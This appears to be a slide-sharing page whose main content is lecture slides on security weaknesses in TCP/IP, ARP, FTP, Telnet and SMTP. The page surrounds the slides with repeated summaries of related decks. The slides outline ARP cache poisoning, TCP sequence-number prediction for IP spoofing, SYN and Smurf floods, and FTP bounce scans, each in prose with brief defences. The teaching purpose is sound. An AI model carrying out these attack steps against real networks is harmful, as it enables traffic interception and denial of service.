This document summarizes vulnerabilities in network protocols like TCP/IP, ARP, IP, TCP, FTP, Telnet, and SMTP. It outlines issues like spoofing, flooding attacks, lack of authentication and encryption. It discusses how protocols work at different layers and security problems associated with each, such as spoofing of addresses, hijacking connections, sniffing cleartext data, and denial of service attacks. Prevention methods are also briefly covered.
This document summarizes vulnerabilities in several common network protocols including ARP, IP, TCP, FTP, SMTP, and DNS. It discusses issues like ARP spoofing, TCP SYN flooding attacks, lack of encryption in FTP and SMTP allowing eavesdropping, and DNS spoofing techniques. The document provides high-level overviews of how these protocols work and specific security risks, such as IP spoofing, traffic analysis from unencrypted headers, and filling connection queues in DoS attacks.
The document discusses various hacking techniques for Cisco networks, including reconnaissance attacks like port scanning and sniffing, active attacks like password cracking and trust exploitation, and external attacks like IP spoofing and denial of service. It then covers defenses like authentication, encryption, access control lists, rate limiting, DHCP snooping, and storm control to mitigate risks from these hacking methods.
Wireshark is a network packet analyzer tool that captures and analyzes network traffic. It allows inspection of protocol messages at the packet level. The Address Resolution Protocol (ARP) maps IP addresses to MAC addresses within a local area network. However, ARP is vulnerable to spoofing attacks where a malicious user sends fake ARP responses to poison a target's ARP cache and intercept their network traffic. TCP session hijacking is also possible by sniffing the TCP sequence and acknowledgement numbers during the initial handshake.
The document provides an agenda and lesson plan for a networking class. It includes:
- An agenda with various activities lasting 5-20 minutes each, including warm ups, videos, teacher demonstrations, and reflections.
- Classroom norms on taking notes and being prepared for quizzes.
- An essential question on the TCP/IP protocol and links to online and offline content on networking topics like TCP/IP, ports, DHCP, and IP addressing.
- Information on IP addressing including address classes, subnets, subnet masks, and examples of IP address allocation.
- Suggestions for further information on TCP/IP topics.
This document discusses network security concepts like vulnerabilities in TCP/IP protocols, denial of service attacks, firewalls, and intrusion detection systems. It outlines common attacks like spoofing, flooding, and session hijacking. It also describes the functions of packet filtering firewalls and proxy firewalls, as well as signature-based and anomaly-based intrusion detection systems that can monitor networks or individual hosts.
This document provides an overview of network security concepts including vulnerabilities, denial of service attacks, firewalls, and intrusion detection systems. It discusses how TCP/IP was not initially designed with security in mind and is vulnerable to spoofing and man-in-the-middle attacks. Denial of service attacks like SYN flooding aim to overwhelm servers or networks. Firewalls can limit access and traffic between internal and external networks but have limitations. Intrusion detection systems monitor traffic to identify attacks that bypass firewalls.
This document provides an overview of network security concepts including vulnerabilities, denial of service attacks, firewalls, and intrusion detection systems. It discusses how TCP/IP was not initially designed with security in mind and is vulnerable to spoofing and man-in-the-middle attacks. Denial of service attacks like SYN flooding aim to overwhelm servers through excessive connection requests. Firewalls use packet filtering and proxies to restrict network access and traffic based on security rules. Intrusion detection systems monitor network traffic to identify attacks and anomalies beyond what is allowed by firewall rules.
This document discusses network security concepts including vulnerabilities in TCP/IP protocols, denial of service attacks, firewalls, and intrusion detection systems. It outlines common attacks like spoofing, flooding, and session hijacking. It then describes how firewalls use packet filtering and proxies to limit access and detect intrusions. Finally, it covers intrusion detection systems using signature-based and anomaly-based approaches to monitor network traffic and host activity for attacks.
Network security vulnerabilities exist at various layers of the TCP/IP protocol suite. Firewalls and intrusion detection systems help mitigate these issues. Firewalls use packet filtering or proxies to restrict traffic according to security policies. Intrusion detection systems monitor network traffic or host activity for signs of attacks using signature-based or anomaly-based detection methods.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and moving data in packets across networks, while higher-level protocols like TCP and UDP provide reliability and port addressing to associate packets with applications. Routers route traffic between networks using IP addressing, while protocols like ARP and DHCP configure IP addresses on devices. TCP provides reliable, connection-oriented communication, while UDP is simpler but unreliable. This layered model has allowed the Internet to scale globally across diverse networks.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and moving data in packets across networks, while higher level protocols like TCP and UDP provide reliability and port addressing to deliver data to applications. Routers route traffic between networks using IP addressing, while protocols like ARP and DHCP help devices configure their IP settings. TCP provides reliable, connection-oriented communication, while UDP is simpler but unreliable. This document provides an overview of the TCP/IP model and common protocols.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Networks are connected via routers that route packets between IP networks using IP addressing.
Title Slide:
Title: Introduction to TCP/IP Networking
Subtitle: Understanding the Backbone of the Internet
Slide 1: Introduction to TCP/IP:
Brief overview of TCP/IP.
Explanation of its importance as the fundamental protocol suite of the Internet.
Slide 2: TCP/IP Layers:
Explanation of the four layers of the TCP/IP model: Link, Internet, Transport, and Application.
Briefly describe the purpose of each layer.
Slide 3: IP Addressing:
Explanation of IP addresses and their role in uniquely identifying devices on a network.
Differentiation between IPv4 and IPv6.
Slide 4: Subnetting:
Introduction to subnetting in TCP/IP networks.
Purpose and benefits of subnetting.
Slide 5: TCP (Transmission Control Protocol):
Overview of TCP and its role as a reliable, connection-oriented protocol.
Explanation of features like error checking, flow control, and sequencing.
Slide 6: UDP (User Datagram Protocol):
Overview of UDP and its role as a connectionless, lightweight protocol.
Comparison with TCP.
Slide 7: Ports and Sockets:
Explanation of ports and sockets in TCP/IP.
Role in enabling communication between applications.
Slide 8: DNS (Domain Name System):
Overview of DNS and its role in translating human-readable domain names into IP addresses.
Importance of DNS in Internet communication.
Slide 9: DHCP (Dynamic Host Configuration Protocol):
Explanation of DHCP and its role in dynamically assigning IP addresses to devices on a network.
Benefits of DHCP.
Slide 10: Routing and Routers:
Overview of routing in TCP/IP networks.
Role of routers in directing data between networks.
Slide 11: Security in TCP/IP:
Introduction to security considerations in TCP/IP networks.
Briefly cover topics like firewalls, VPNs, and encryption.
Slide 12: Future Trends:
Brief discussion on emerging technologies and trends in TCP/IP.
Topics like IoT (Internet of Things) and 5G.
Slide 13: Conclusion:
Summary of key points.
Emphasis on the ubiquity and importance of TCP/IP in modern networking.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Networks are connected via routers that route packets between IP addresses. This allows different networks using different link layer technologies like Ethernet to interconnect.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Routers use IP addresses and routing tables to direct traffic between networks, while protocols like ARP map IP addresses to MAC addresses for delivery within a local network.
The document discusses transport layer protocols and their role in providing communication between application processes on different hosts. It describes the two main Internet transport protocols, UDP which provides a simple unreliable datagram service, and TCP which provides reliable in-order delivery of data streams through mechanisms like acknowledgments, retransmissions, and flow control. The document also examines how TCP establishes connections, handles packet loss through retransmissions, and provides reliable data transfer over unreliable networks.
This document provides an overview of transport layer protocols and TCP/IP. It discusses:
1. The role of the transport layer in providing communication between processes and serving the application layer. The main transport protocols are TCP and UDP.
2. TCP provides reliable, in-order delivery through mechanisms like checksums, sequence numbers, acknowledgments, retransmissions, and flow control. UDP provides a simpler unreliable datagram service.
3. TCP establishes connections using a three-way handshake and tears them down through FIN packets. It provides a reliable byte stream using segments with sequence numbers within a sliding window.
The document discusses various phases of intrusion and techniques used by attackers:
1. Reconnaissance involves gathering information about the target through techniques like searching public databases, domain name records, and social engineering to map the network and discover vulnerabilities.
2. Scanning detects live machines, network topology, firewall configurations, applications, and vulnerabilities using tools like ping sweeps, traceroute, port scanning, and vulnerability scanners.
3. Gaining access exploits known vulnerabilities through buffer overflow attacks or by downloading exploits from hacker sites to compromise systems.
The document provides an overview of network infrastructure components including networking hardware, software, and services. It then discusses several key network protocols including TCP, IP, routing protocols, and DNS. It provides details on the OSI model and describes each layer including typical functions, protocols, and vulnerabilities. For TCP and IP, it outlines the basic operation including packet formatting, connection establishment, flow control, congestion control, and error handling.
1. A host creates a packet and places the destination address in the header.
2. The host sends the packet to the nearest router.
3. Each router uses the destination address to select the next router and forwards the packet.
4. The packet is forwarded from router to router until it reaches the destination router, which delivers it to the final destination host.
The document discusses the TCP/IP protocol suite and transport layer services. Some key points:
- TCP/IP was originally developed by DARPA and later included in UNIX. It maps to the OSI layers and supports various physical/data link protocols.
- The transport layer provides logical communication between application processes on different hosts. TCP and UDP are the main transport protocols.
- TCP provides reliable, in-order byte streams using connection establishment and acknowledgments. UDP is a simpler connectionless protocol.
- Port numbers and IP addresses are used to multiplex/demultiplex segments between sockets at hosts for processes to communicate.
- TCP uses a three-way handshake to establish reliable connections between
The document discusses the four levels of addressing used in TCP/IP:
1. Physical address - identifies network interfaces or devices
2. Logical address - IP addresses that identify devices on the network
3. Port address - identifies applications/processes on devices using port numbers
4. Application-specific address - some applications use their own addressing schemes above the port level.
This document provides an introduction to socket programming in C on Linux. Some key points:
- Sockets allow communication between processes over a network and act as an interface between applications and the network. They are represented by file descriptors.
- There are two main types of sockets - stream sockets (TCP) which provide reliable, ordered data transmission and datagram sockets (UDP) which are unreliable but do not require a connection.
- The socket API includes functions like socket(), bind(), listen(), accept(), connect(), recv(), send(), etc. to create and manage sockets and network communication.
- Data structures like sockaddr_in are used to store socket addresses containing IP and port. Byte ordering functions like
Zhiyun Qian-what leaves attacker hijacking USA Today site (GeekPwn Keen)
In the GeekPwn2016 Mid-year Contest, doctoral student Cao Yue, a student of Dr. Zhiyun Qian, demonstrated a ‘TCP hijacking’ attack. The attack can pop up a phishing web page and steal a user’s password. This vulnerability in the TCP/IP stack exists in almost all Android and Linux editions. As Cao Yue explained, the vulnerability was found by his director, Mr. Qian, by reviewing the Linux kernel source code.
At Digidev, we are working to be the leader in interactive streaming platforms of choice by smart device users worldwide.
Our goal is to become the ultimate distribution service of entertainment content. The Digidev application will offer the next generation television highway for users to discover and engage in a variety of content. While also providing a fresh and
innovative approach towards advertainment with vast revenue opportunities. Designed and developed by Joe Q. Bretz
Top IPTV UK Providers of A Comprehensive Review.pdfXtreame HDTV
The television landscape in the UK has evolved significantly with the rise of Internet Protocol Television (IPTV). IPTV offers a modern alternative to traditional cable and satellite TV, allowing viewers to stream live TV, on-demand videos, and other multimedia content directly to their devices over the internet. This review provides an in-depth look at the top IPTV UK providers, their features, pricing, and what sets them apart.
Network security vulnerabilities exist at various layers of the TCP/IP protocol suite. Firewalls and intrusion detection systems help mitigate these issues. Firewalls use packet filtering or proxies to restrict traffic according to security policies. Intrusion detection systems monitor network traffic or host activity for signs of attacks using signature-based or anomaly-based detection methods.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and moving data in packets across networks, while higher-level protocols like TCP and UDP provide reliability and port addressing to associate packets with applications. Routers route traffic between networks using IP addressing, while protocols like ARP and DHCP configure IP addresses on devices. TCP provides reliable, connection-oriented communication, while UDP is simpler but unreliable. This layered model has allowed the Internet to scale globally across diverse networks.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and moving data in packets across networks, while higher level protocols like TCP and UDP provide reliability and port addressing to deliver data to applications. Routers route traffic between networks using IP addressing, while protocols like ARP and DHCP help devices configure their IP settings. TCP provides reliable, connection-oriented communication, while UDP is simpler but unreliable. This document provides an overview of the TCP/IP model and common protocols.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Networks are connected via routers that route packets between IP networks using IP addressing.
Title Slide:
Title: Introduction to TCP/IP Networking
Subtitle: Understanding the Backbone of the Internet
Slide 1: Introduction to TCP/IP:
Brief overview of TCP/IP.
Explanation of its importance as the fundamental protocol suite of the Internet.
Slide 2: TCP/IP Layers:
Explanation of the four layers of the TCP/IP model: Link, Internet, Transport, and Application.
Briefly describe the purpose of each layer.
Slide 3: IP Addressing:
Explanation of IP addresses and their role in uniquely identifying devices on a network.
Differentiation between IPv4 and IPv6.
Slide 4: Subnetting:
Introduction to subnetting in TCP/IP networks.
Purpose and benefits of subnetting.
Slide 5: TCP (Transmission Control Protocol):
Overview of TCP and its role as a reliable, connection-oriented protocol.
Explanation of features like error checking, flow control, and sequencing.
Slide 6: UDP (User Datagram Protocol):
Overview of UDP and its role as a connectionless, lightweight protocol.
Comparison with TCP.
Slide 7: Ports and Sockets:
Explanation of ports and sockets in TCP/IP.
Role in enabling communication between applications.
Slide 8: DNS (Domain Name System):
Overview of DNS and its role in translating human-readable domain names into IP addresses.
Importance of DNS in Internet communication.
Slide 9: DHCP (Dynamic Host Configuration Protocol):
Explanation of DHCP and its role in dynamically assigning IP addresses to devices on a network.
Benefits of DHCP.
Slide 10: Routing and Routers:
Overview of routing in TCP/IP networks.
Role of routers in directing data between networks.
Slide 11: Security in TCP/IP:
Introduction to security considerations in TCP/IP networks.
Briefly cover topics like firewalls, VPNs, and encryption.
Slide 12: Future Trends:
Brief discussion on emerging technologies and trends in TCP/IP.
Topics like IoT (Internet of Things) and 5G.
Slide 13: Conclusion:
Summary of key points.
Emphasis on the ubiquity and importance of TCP/IP in modern networking.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Networks are connected via routers that route packets between IP addresses. This allows different networks using different link layer technologies like Ethernet to interconnect.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Routers use IP addresses and routing tables to direct traffic between networks, while protocols like ARP map IP addresses to MAC addresses for delivery within a local network.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Routers use IP addresses and routing tables to direct traffic between networks, while protocols like ARP map IP addresses to MAC addresses for delivery within a local network.
The document discusses transport layer protocols and their role in providing communication between application processes on different hosts. It describes the two main Internet transport protocols, UDP which provides a simple unreliable datagram service, and TCP which provides reliable in-order delivery of data streams through mechanisms like acknowledgments, retransmissions, and flow control. The document also examines how TCP establishes connections, handles packet loss through retransmissions, and provides reliable data transfer over unreliable networks.
This document provides an overview of transport layer protocols and TCP/IP. It discusses:
1. The role of the transport layer in providing communication between processes and serving the application layer. The main transport protocols are TCP and UDP.
2. TCP provides reliable, in-order delivery through mechanisms like checksums, sequence numbers, acknowledgments, retransmissions, and flow control. UDP provides a simpler unreliable datagram service.
3. TCP establishes connections using a three-way handshake and tears them down through FIN packets. It provides a reliable byte stream using segments with sequence numbers within a sliding window.
The document discusses various phases of intrusion and techniques used by attackers:
1. Reconnaissance involves gathering information about the target through techniques like searching public databases, domain name records, and social engineering to map the network and discover vulnerabilities.
2. Scanning detects live machines, network topology, firewall configurations, applications, and vulnerabilities using tools like ping sweeps, traceroute, port scanning, and vulnerability scanners.
3. Gaining access exploits known vulnerabilities through buffer overflow attacks or by downloading exploits from hacker sites to compromise systems.
The document provides an overview of network infrastructure components including networking hardware, software, and services. It then discusses several key network protocols including TCP, IP, routing protocols, and DNS. It provides details on the OSI model and describes each layer including typical functions, protocols, and vulnerabilities. For TCP and IP, it outlines the basic operation including packet formatting, connection establishment, flow control, congestion control, and error handling.
1. A host creates a packet and places the destination address in the header.
2. The host sends the packet to the nearest router.
3. Each router uses the destination address to select the next router and forwards the packet.
4. The packet is forwarded from router to router until it reaches the destination router, which delivers it to the final destination host.
The document discusses the TCP/IP protocol suite and transport layer services. Some key points:
- TCP/IP was originally developed by DARPA and later included in UNIX. It maps to the OSI layers and supports various physical/data link protocols.
- The transport layer provides logical communication between application processes on different hosts. TCP and UDP are the main transport protocols.
- TCP provides reliable, in-order byte streams using connection establishment and acknowledgments. UDP is a simpler connectionless protocol.
- Port numbers and IP addresses are used to multiplex/demultiplex segments between sockets at hosts for processes to communicate.
- TCP uses a three-way handshake to establish reliable connections between
The document discusses the four levels of addressing used in TCP/IP:
1. Physical address - identifies network interfaces or devices
2. Logical address - IP addresses that identify devices on the network
3. Port address - identifies applications/processes on devices using port numbers
4. Application-specific address - some applications use their own addressing schemes above the port level.
This document provides an introduction to socket programming in C on Linux. Some key points:
- Sockets allow communication between processes over a network and act as an interface between applications and the network. They are represented by file descriptors.
- There are two main types of sockets - stream sockets (TCP) which provide reliable, ordered data transmission and datagram sockets (UDP) which are unreliable but do not require a connection.
- The socket API includes functions like socket(), bind(), listen(), accept(), connect(), recv(), send(), etc. to create and manage sockets and network communication.
- Data structures like sockaddr_in are used to store socket addresses containing IP and port. Byte ordering functions like
Zhiyun Qian-what leaves attacker hijacking USA Today siteGeekPwn Keen
In GeekPwn2016 Mid-year Contest, doctoral student Cao Yue of Dr.Zhiyun Qian showed ‘TCP hijacking’ attack. This attack can pop up a fishing web page and steal user’s password. This vulnerability in TCP/IP stack exists in almost all Android and Linux editions. Explained by Cao Yue, this vulnerability is found by his director, Mr. Qian found this vulnerability by reviewing Linux kernel source code.
2. 2
Outline
• TCP/IP Layering
• Names and Addresses
• Security Considerations for
– Address Resolution Protocol
– Internet Protocol
– Transmission Control Protocol
– FTP, Telnet, SMTP
– Web Security
• Browser Side Risks
• Server Side Risks
8. 8
IP Addresses
• Just to refresh!
• Every interface has a unique IP address
• 32 bits long, usually given in dotted decimal
notation
• 5 classes:
– class A: “0” + 7 bits net ID + 24 bits host ID
– class B: “10” + 14 bits net ID + 16 bits host ID
– class C: “110” + 21 bits net ID + 8 bits host ID
– class D: “1110” + 28 bits multicast group ID
– class E: “11110”, reserved for future use
9. 9
Subnet Addressing
• CIDR - Classless Inter-Domain Routing
• Host ID portion is divided into a subnet ID and a host ID
• e.g., class B address: “10” + 14 bit net ID + 8 bit subnet ID + 8 bit host ID
• Hierarchical addressing
10. 10
Hardware (MAC) Addresses
• Every interface has a unique and fixed
hardware address too
• Used by the data link layer
• In case of Ethernet, it is 48 bits long
• Mapping between IP addresses and MAC
addresses are done by ARP
11. 11
Host Names
• Human readable, hierarchical names, such
as www.case.edu.pk
• Every host may have several names
• Mapping between names and IP addresses
is done by the Domain Name System (DNS)
15. 15
ARP Spoofing
• Used for sniffing on switched LAN
1. Configure IP forwarding
2. Send fake ARP response to map default router’s IP to attacker’s MAC
3. Victim sends traffic based on poisoned ARP cache
4. Sniff the traffic from the link
5. Packets are forwarded from attacker’s machine to actual default router
[Figure: Victim, Attacker and Default Router attached to a Switch; the Default Router leads to the Outside World]
16. 16
ARP Spoofing Prevention ?
• Cryptographic protection on the data is the
only way
– Not allow any untrusted node to read the
contents of your traffic
18. 18
IP – Internet Protocol
• Provides an unreliable, connectionless datagram
delivery service to the upper layers
• Its main function is routing
• It is implemented in both end systems and
intermediate systems (routers)
• Routers maintain routing tables that define the
next hop router towards a given destination (host
or network)
• IP routing uses the routing table and the
information in the IP header (e.g., the destination
IP address) to route a packet
19. 19
IP Security Problems
• User data in IP packets is not protected in any
way
– Anyone who has access to a router can read and
modify the user data in the packets
• IP packets are not authenticated
– It is fairly easy to generate an IP packet with
an arbitrary source IP address
• Traffic analysis
– Even if user data was encrypted, one could
easily determine who is communicating with
whom by just observing the addressing
information in the IP headers
20. 20
IP Security Problems
• Information exchanged between routers to
maintain their routing tables is not
authenticated
– Correct routing table updates can be
modified or fake ones can be
disseminated
– This may screw up routing completely
leading to loops or partitions
– It may also facilitate eavesdropping,
modification, and monitoring of traffic
– It may cause congestion of links or
routers (i.e., denial of service)
22. 22
TCP – Transmission Control
Protocol
• Provides a connection oriented, reliable,
byte stream service to the upper layers
• Connection oriented:
– Connection establishment phase prior to
data transfer
– State information (sequence numbers,
window size, etc.) is maintained at both
ends
23. 23
TCP- Reliability
• Positive acknowledgement scheme
(unacknowledged bytes are retransmitted
after a timeout)
• Checksum on both header and data
• Reordering of segments that are out of
order
• Detection of duplicate segments
• Flow control (sliding window mechanism)
25. 25
TCP Sequence Numbers
• TCP uses ISN (Initial Sequence Number)
to order the incoming packets for a
connection
• Sequence numbers are 32 bits long
• The sequence number in a data segment
identifies the first byte in the segment
• Sequence numbers are initialized with a
“random” value during connection setup
• The RFC suggests that the ISN is incremented by one at least every 4 µs
26. 26
TCP SYN Attack
• An attacker can impersonate a trusted host
(e.g., in case of r commands, authentication is
based on source IP address solely)
– This can be done guessing the sequence number in
the ongoing communication
– The initial sequence numbers are intended to be
more or less random
27. 27
TCP SYN Attack
• In Berkeley implementations, the ISN is
incremented by a constant amount
– 128,000 once per second, and
– further 64,000 each time a connection is
initiated
• RFC 793 specifies that the 32-bit counter be incremented by 1 about every 4 µs
– the ISN cycles every 4.55 hours
• Whatever! It is not hopeless to guess the
next ISN to be used by a system
28. 28
Launching a SYN Attack
• The attacker first establishes a valid connection with the target to learn its ISN.
• Next it impersonates trusted host T and sends the connection request with ISN_X
• The target sends the ACK with its ISN_S to the trusted host T
• After the expected time, the attacker sends the ACK with the predicted ISN_S’
29. 29
Launching a SYN Attack
attacker → server: SYN = ISN_X, SRC_IP = T
server → trusted host (T): SYN = ISN_S, ACK(ISN_X)
attacker → server: ACK(ISN_S), SRC_IP = T
attacker → server: SRC_IP = T, nasty_data
30. 30
What about the ACK for T?
• If the ACK is received by the trusted host T
– It will reject it, as no request for a connection was made
by it
– RST will be sent and the server drops the connection
BUT!!!
• The attacker can either launch this attack when T
is down
• Or launch some sort of DoS attack on T
– So that it can’t reply
31. 31
TCP SYN Attack – How to Guess ISN_S?
– ISN_S’ (Attacker’s ISN) depends on ISN_S and Δt
– Δt can be estimated from the round trip time
– Assume Δt can be estimated with 10 ms precision
[Figure: attacker and server timelines separated by Δt]
32. 32
TCP SYN Attack – How to Guess ISN_S?
• Attacker has an uncertainty of 1280 (128,000 per second × 10 ms) in the possible value for ISN_S’
• Assume each trial takes 5 s
• The attacker has a reasonable likelihood of succeeding in 6400 s (1280 trials × 5 s) and a near-certainty within one day!
33. 33
How to Prevent it?
• Can be prevented by properly
configuring the firewall
– Do not allow any communication from
outside using the address of some
internal network
34. 34
TCP SYN Flood
• Attacker’s goal is to overwhelm the destination machine with SYN packets with spoofed IP
• This results in:
– The server’s connection queue filling up causing DoS Attack
– Or even if queue is large enough, all ports will be busy and the service could not be provided by the server
[Figure: client C sends SYN_C1 … SYN_C5 to the listening server S, which stores data for each one]
35. 35
How to Avoid TCP SYN Flood
• Decrease the wait time for half open
connection
• Do not store the connection information
• Use SYN cookies as sequence numbers
during connection setup
• SYN cookie is some function applied on
– Dest IP, Source IP, Port numbers, Time
and a secret number
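A sketch of the SYN-cookie idea from the slide above, added here as an illustration (it is not code from the slides or from any TCP stack): the server derives its ISN from the addresses, ports, a time counter and a secret, so nothing is stored until the final ACK proves the client saw the SYN-ACK. The HMAC-SHA256 construction, the 64-second slot, the 8/24-bit split and all function names are assumptions of this example; real stacks also encode the MSS in the cookie.

```python
import hashlib
import hmac
import ipaddress
import secrets
import struct

SLOT_SECONDS = 64      # assumed granularity of the "Time" input
ACCEPTED_SLOTS = 2     # accept the current slot plus the previous one
COUNTER_BITS = 8       # high bits of the ISN carry the slot counter
MAC_BITS = 32 - COUNTER_BITS
SECRET = secrets.token_bytes(32)   # the "secret number", fresh per boot


def cookie_for_slot(slot, src_ip, src_port, dst_ip, dst_port, client_isn, secret):
    """32-bit ISN laid out as [slot mod 2^8 | truncated HMAC over the tuple]."""
    msg = (ipaddress.ip_address(src_ip).packed
           + ipaddress.ip_address(dst_ip).packed
           + struct.pack("!HHQI", src_port, dst_port, slot, client_isn))
    mac = int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:4], "big")
    mac &= (1 << MAC_BITS) - 1
    return ((slot % (1 << COUNTER_BITS)) << MAC_BITS) | mac


def make_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, now, secret=SECRET):
    """On SYN: compute the ISN for the SYN-ACK and keep no per-connection state."""
    return cookie_for_slot(int(now) // SLOT_SECONDS, src_ip, src_port,
                           dst_ip, dst_port, client_isn, secret)


def check_ack(src_ip, src_port, dst_ip, dst_port, seq, ack, now, secret=SECRET):
    """On the final ACK: rebuild the cookie from the packet fields alone."""
    claimed = (ack - 1) % (1 << 32)      # the ACK acknowledges server ISN + 1
    client_isn = (seq - 1) % (1 << 32)   # the client's SYN consumed one number
    current = int(now) // SLOT_SECONDS
    for age in range(ACCEPTED_SLOTS):
        slot = current - age
        if slot < 0:
            break
        expected = cookie_for_slot(slot, src_ip, src_port, dst_ip, dst_port,
                                   client_isn, secret)
        if hmac.compare_digest(struct.pack("!I", expected),
                               struct.pack("!I", claimed)):
            return True                  # only now allocate connection state
    return False                         # stale, forged or spoofed-source ACK
```

A sender that spoofed its source address never receives the SYN-ACK, so it cannot return a matching ACK, and the half-open queue the flood targets is never filled.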
36. 36
TCP Congestion Control
• If packets are lost, assume congestion
– Reduce transmission rate by half, repeat
– If loss stops, increase rate very slowly
Design assumes routers blindly obey this policy
[Figure: Source sending to Destination]
37. 37
TCP Congestion Control-
Competition
• Amiable source A yields to boisterous source B
– Both senders experience packet loss
– Source A backs off
– Source B disobeys protocol, gets better results!
[Figure: Source A and Source B each sending to a Destination]
38. 38
DoS-Denial of Service
Attacks
• Attempts to prevent the victim from being
able to establish connections
• Accomplished by involving the victim in
heavy processing
– like sending the TCP SYN packets to all
ports of the victim and avoiding new
connection establishment
• DoS attacks are much easier to accomplish
than gaining administrative access
39. 39
Exploiting Ping Command for
Smurf DoS Attack
• Send ping request (ICMP Echo Req) to subnet-directed broadcast address with spoofed IP
• Lots of responses:
– Every host on target network generates a ping reply (ICMP Echo Reply) to victim
– Ping reply stream can overload victim
[Figure: (1) DoS Source sends ICMP Echo Req through the gateway, Src: DoS Target, Dest: broadcast addr; (3) ICMP Echo Reply, Dest: DoS Target]
40. 40
Smurf DoS Attack
Prevention
• Have adequate bandwidth and redundant
paths
• Filter ICMP messages to reject external
packets to broadcast address
• Any other approach ?
41. 41
FTP – File Transfer Protocol
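[Figure: FTP model. Client: user, user interface, protocol interpreter, data transfer function, file system. Server: protocol interpreter, data transfer function, file system. The protocol interpreters are joined by the control connection (FTP commands and replies); the data transfer functions are joined by the data connection.]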
42. 42
FTP – File Transfer Protocol
• Typical FTP commands:
– RETR filename – retrieve (get) a file from the server
– STOR filename – store (put) a file on the server
– TYPE type – specify file type (e.g., A for ASCII)
– USER username – username on server
– PASS password – password on server
• FTP is a text (ASCII) based protocol
% ftp ftp.case.edu.pk
Connected to ftp.case.edu.pk.
Name: abc
Password: pswd
client server
<TCP connection setup to port 21 of ftp.case.edu.pk >
“220 ftp.case.edu.pk FTP server (version 5.60) ready.”
“USER abc”
“331 Password required for user abc.”
“PASS pswd”
“230 User abc logged in.”
…
43. 43
Problems with FTP
• FTP information exchange is in clear text
– The attacker can easily eavesdrop and get the
secret information
– The attacker can also know the software
version of FTP running to exploit the
vulnerabilities of that particular version
44. 44
FTP Bounce Scans
• FTP has a feature to open a connection with the victim machine on request from the attacker machine
• Machine A (Attacker) can request to check for the open ports on the target machine X (Victim)
• Newer versions of FTP do not support this forwarding feature
[Figure: Attacker, FTP Server, Victim to be scanned]
45. 45
Telnet
• Provides remote login service to users
• Works between hosts that use different operating
systems
• Uses option negotiation between client and server
to determine what features are supported by both
ends
[Figure: Telnet client and Telnet server joined by a TCP connection. Client side: user, terminal driver and TCP/IP in the kernel. Server side: login shell, pseudo-terminal driver and TCP/IP in the kernel.]
46. 46
Telnet Session Example
• Single character at a time
% telnet ahost.com.pk
Connected to ahost.epfl.ch.
Escape character is ‘^]’.
Login: s
client server
<TCP connection setup to port 23 of ahost.com.pk>
<Telnet option negotiation>
“UNIX(r) System V Release 4.0”
“Login:”
“s”
“Password:”
…
Login: st
“t”
Login: student
“t”
Password: c
“c”
…
Password: case123
“3”
<OS greetings and shell prompt, e.g., “%”>
…
…
…
47. 47
Problems with Telnet
• Information exchange is in clear text
– The attacker can easily eavesdrop and
get the information like username and
passwords
– The attacker can also know the version
to exploit the vulnerabilities of that
particular version
48. 48
SMTP – Simple Mail
Transfer Protocol
[Figure: SMTP mail path. Sending host: user, user agent, mails to be sent, local MTA. Relay MTAs in between. Receiving host: local MTA, user mailbox, user agent, user. The MTAs speak SMTP to each other over TCP connections to TCP port 25.]
49. 49
SMTP
• SMTP is a text (ASCII) based protocol
• MTA transfers mail from the user to
the destination server
• MTA relays are used to relay the mail
from other clients
• MTAs use SMTP to talk to each other
• All the messages are spooled before
sending
50. 50
SMTP Message Flow
sending MTA (rivest.case.edu.pk) receiving MTA (shamir.care.com.pk)
<TCP connection establishment to port 25>
“HELO rivest.case.edu.pk.”
“250 shamir.care.com.pk Hello rivest.case.edu.pk., pleased to meet you”
“MAIL from: student1@rivest.case.edu.pk”
“250 student1@rivest.case.edu.pk... Sender ok”
“RCPT to: student2@lca.epfl.ch”
“250 student2@lca.epfl.ch… Recipient ok”
“DATA”
“354 Enter mail, end with a “.” on a line by itself”
<message to be sent>
.
“250 Mail accepted”
“QUIT”
“221 shamir.care.com.pk delivering mail”
51. 51
SMTP Security Problems
• Designed in an era where internet security
was not much of an issue
– No security at the base protocol
• Designed around the idea of “cooperation”
and “trust” between servers
– Susceptible to DoS attacks
• Simply flood a mail server with SMTP
connections or SMTP instructions.
52. 52
SMTP Security Problems
• SMTP does not provide any protection of e-
mail messages
– Does not ask sender to authenticate itself.
– Messages can be read and modified by any
of the MTAs involved
– Fake messages can easily be generated (e-
mail forgery)
– Does not check what and from whom it is
